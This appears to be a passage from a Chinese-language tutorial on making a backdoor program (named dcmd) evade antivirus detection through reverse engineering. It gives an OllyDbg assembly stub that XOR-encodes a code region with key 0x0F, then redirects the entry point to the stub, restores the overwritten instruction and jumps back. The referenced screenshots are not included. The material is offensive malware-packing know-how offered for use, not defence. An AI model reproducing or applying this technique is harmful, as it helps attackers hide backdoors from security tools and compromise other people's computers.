逆向工程打造免杀后门

核心提示： 004011F0 B8 1F104000 MOV EAX,dcmd.0040101F ;需要加/解密部分的起始地址 004011F5 8030 0F XOR BYTE PTR DS:[EAX],0F ;与0f进行异或，这个0f读者朋友可以自由替换 004011F8 40 INC EAX ;

004011F0 B8 1F104000 MOV EAX,dcmd.0040101F ;需要加/解密部分的起始地址

004011F5 8030 0F XOR BYTE PTR DS:[EAX],0F ;与0f进行异或，这个0f读者朋友可以自由替换

004011F8 40 INC EAX ;递增eax

004011F9 3D FE104000 CMP EAX,dcmd.004010FE ；看看是不是到了加/解密部分的结束地址

004011FE ^7E F5 JLE SHORT dcmd.004011F5 ；如果没到继续循环了

程序就这么简单，看上去很容易哦。。。这还没完呢继续回到olly上来，来到程序的入口地址处按空格键进行汇编，输入：jmp 004011f0，如图八。

图片看不清楚？请点击这里查看原图（大图）。

这个时候拿出我们先前备份的那段代码进行比较，看看有哪些指令被覆盖了，如图九。

图片看不清楚？请点击这里查看原图（大图）。　

只有 SUB ESP,190一条指令被覆盖了，那么我们就要在加/解密代码的最后处把覆盖的指令添上，而且还要添加一条跳转指令，跳转回入口地址的下一条地址，完整代码如图十。